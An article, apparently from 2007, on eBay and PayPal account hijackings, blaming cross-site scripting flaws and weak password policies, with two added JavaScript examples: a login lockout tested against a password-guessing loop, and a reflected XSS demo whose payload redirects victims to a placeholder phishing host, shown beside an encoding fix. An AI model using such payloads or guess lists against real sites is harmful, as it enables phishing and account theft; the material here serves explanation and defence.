Vulnerabilities in eBay site may be to blame
February 5, 2007
By now, we're all used to seeing those fake emails that claim your eBay account was hijacked, or that cite listings for items you know aren't really on your account. The goal of these emails, called phishes, is to get you to follow the link provided in the email and enter your login credentials on a spoofed eBay look-alike site, after which the credentials are logged for later use by the attackers.
But these prolific phish may be a red-herring, diverting attention from the very real problem of legitimate, non-phished eBay hijackings.
Even worse, these hijackings may be a result of security vulnerabilities in eBay and PayPal's own websites.
The scam works like this:
A fraudulent seller obtains access to a trusted eBay account and posts items for sale under the hijacked account. The auction either instructs the buyer to submit payment to a specific account (not the one tied to the eBay account) or, after the auction is complete, the fraudulent seller instructs the buyer to send funds to a different account. The buyer submits the payment, the fraudulent seller takes off with the money and never sends the buyer the purchased item. The duped buyer then reports the matter to eBay and the legitimate account holder is held liable. Sometimes these scams even result in the legitimate user being suspended from use of their eBay account for up to a year.
Such hijackings allow an unscrupulous person to exploit others by taking advantage of the good reputation of a legitimate eBay auctioneer.
Getting access to eBay accounts
How the eBay credentials are being obtained isn't always clear. In some cases they could have been obtained by a classic phishing scam. In other cases, scammers have reportedly hijacked the user's email account first, then used eBay's 'lost password' feature to have a new password sent to that mailbox. This is particularly problematic for unmonitored email accounts, which are often set up specifically for site registration to keep the accompanying spam out of a primary inbox. Depending on the site, it's also possible the passwords are being brute forced, so sites that don't impose a lockout after a fixed number of failed attempts are particularly vulnerable.
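To make the brute-force point concrete, here is an added example (not eBay's code, and not from the original article) of a per-account lockout applied in front of a credential check, run against a constructed guess list with and without the lockout. The threshold of five failures, the fifteen-minute window, the user store and the guess list are all assumptions chosen for the example.

```javascript
// Added example (not eBay's or PayPal's code): a per-account failed-login lockout and the
// effect it has on a password-guessing attack. The threshold, lockout window, user store
// and guess list are constructed for this example.

const DEFAULT_POLICY = { maxFailures: 5, lockoutMs: 15 * 60 * 1000 };

class LoginGuard {
  // verify: (user, password) => boolean, the site's real credential check.
  // policy: { maxFailures, lockoutMs }; maxFailures = Infinity disables the lockout.
  // now: clock function, injectable so the window can be exercised without waiting.
  constructor(verify, policy = DEFAULT_POLICY, now = () => Date.now()) {
    this.verify = verify;
    this.policy = policy;
    this.now = now;
    this.state = new Map(); // user -> { failures, lockedUntil }
  }

  attempt(user, password) {
    const t = this.now();
    const s = this.state.get(user) || { failures: 0, lockedUntil: 0 };
    if (t < s.lockedUntil) {
      return "locked"; // rejected before the password is even checked
    }
    if (this.verify(user, password)) {
      this.state.delete(user); // success clears the failure counter
      return "ok";
    }
    s.failures += 1;
    if (s.failures >= this.policy.maxFailures) {
      s.lockedUntil = t + this.policy.lockoutMs;
      s.failures = 0;
    }
    this.state.set(user, s);
    return "denied";
  }
}

// Constructed user store and guess list. The real password is last in the list, so an
// unthrottled attacker reaches it on the sixth try.
const USERS = { alice: "correct horse battery" };
const verify = (user, password) => USERS[user] === password;
const GUESSES = ["123456", "password", "qwerty", "letmein", "abc123", "correct horse battery"];

// Run the guess list against one account and report the outcome of each attempt.
function bruteForce(guard, user, guesses) {
  return guesses.map((g) => guard.attempt(user, g));
}

if (typeof require !== "undefined" && require.main === module) {
  const open = new LoginGuard(verify, { maxFailures: Infinity, lockoutMs: 0 });
  console.log("no lockout:", bruteForce(open, "alice", GUESSES));
  console.log("lockout:   ", bruteForce(new LoginGuard(verify), "alice", GUESSES));
}
```

Without the lockout the sixth guess succeeds; with it, the sixth attempt is refused before the password is checked, and stays refused until the window expires. Two caveats a practitioner should keep in mind: a per-account lockout is also a lever for locking the legitimate user out, so many sites use progressive delays or a challenge past the threshold instead of a hard lock; and it does nothing against an attacker who tries one common password across many accounts, which needs a per-source throttle as well.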
Cross-site scripting may be to blame
Unfortunately, in an alarming number of cases the most likely explanation is that the credentials were exposed through security vulnerabilities in eBay and its sister service, PayPal. The vulnerabilities, known as cross-site scripting (XSS), allow remote attackers to inject script into real pages on the legitimate eBay and PayPal websites. As a result, victims of an XSS exploit could have been redirected, with no warning, to a phishing site while on the legitimate eBay or PayPal website. This means that even security-conscious, computer-savvy users who would never click an eBay or PayPal link in email could still have been compromised.
Related reports:
eBay Contains a Cross-Site (XSS) Vulnerability (April 2006)
PayPal Security Flaw Allows Identity Theft (June 2006)
PayPal XSS Exploit Available for Two Years
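The mechanism described above, as an added example that is not part of the original article and not eBay's or PayPal's code: a reflected cross-site scripting bug in a search page lets an attacker craft a link whose host really is the legitimate site, yet whose query string carries script that sends the victim's browser to a phishing page. The same page with output encoding is shown beside it. The site URL, the "q" parameter name, the page layout and the phishing host are all placeholders for the example.

```javascript
// Added example (not eBay's or PayPal's code): how a reflected XSS bug on a legitimate site
// turns a link to that site into a redirect to a phishing page, and how HTML output encoding
// removes the problem. The site URL, the "q" parameter and the phishing host are placeholders.

// Minimal HTML output encoder for text placed inside an element body or a quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable search page: the query string is interpolated into the HTML untouched.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Hardened version: the same page with the query encoded before interpolation.
function renderSearchSafe(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// The attacker's payload: script that sends the browser to a look-alike login page.
// The phishing host is a placeholder.
const PAYLOAD = '<script>location.href="http://phish.example/signin"</script>';

// Build the link the attacker would distribute. The host is the legitimate site; only the
// query string carries the payload, so the link passes a "check the domain" test.
function buildAttackUrl(siteBase, payload) {
  const url = new URL("/search", siteBase);
  url.searchParams.set("q", payload);
  return url.toString();
}

// What the server sees when the victim follows the link: the decoded query parameter.
function queryFromUrl(urlString) {
  return new URL(urlString).searchParams.get("q");
}

// Deliberately simple check used below: does the rendered page contain a script element
// that the browser will execute? A real scanner would parse the HTML instead.
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Walk the attack end to end for a given page renderer.
function simulateVisit(render, siteBase = "https://legit.example") {
  const link = buildAttackUrl(siteBase, PAYLOAD);
  const page = render(queryFromUrl(link));
  return {
    linkHost: new URL(link).host,          // what the victim sees: the legitimate host
    redirectsToPhish: containsScriptElement(page),
    page,
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", simulateVisit(renderSearchVulnerable));
  console.log("hardened:  ", simulateVisit(renderSearchSafe));
}
```

In the vulnerable rendering the payload lands in the page as a live script element and the redirect fires as soon as the page loads; in the hardened rendering the same bytes appear as harmless text (`&lt;script&gt;...`). Note that the fix is encoding at the point of output, not filtering the input: the server had no way to know the query was hostile, only that it was being placed into HTML.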
Despite the known XSS vulnerabilities, it doesn't appear eBay has been too forthcoming about the problem. One victim of an eBay hijacking commends eBay customer service for their rapid response, and even posts the chat dialog with the eBay support rep. However, when reading the chat session, dated September 2006, pay special note to the fact that eBay never once mentions the possibility of the XSS vulnerability, known since at least April 2006. Instead, eBay repeatedly asserts the user responded to a phishing email. To read the chat session, see: eBay's Superb Customer Service
So how can you protect your online assets?
Keeping an eye on your online interests is key. This means logging onto the site on a frequent basis to detect early signs of fraudulent activity. Be sure to report any suspicious activity immediately. To avoid compromise by the 'lost password' feature, keep a close eye on any email address used for site registration.
Most importantly: (a) never use the same username/password combo on multiple sites; (b) use strong passwords; and (c) change passwords often. For tips on creating strong passwords - and remembering them all - see: Passwords: Creating and Maintaining a Strong Password System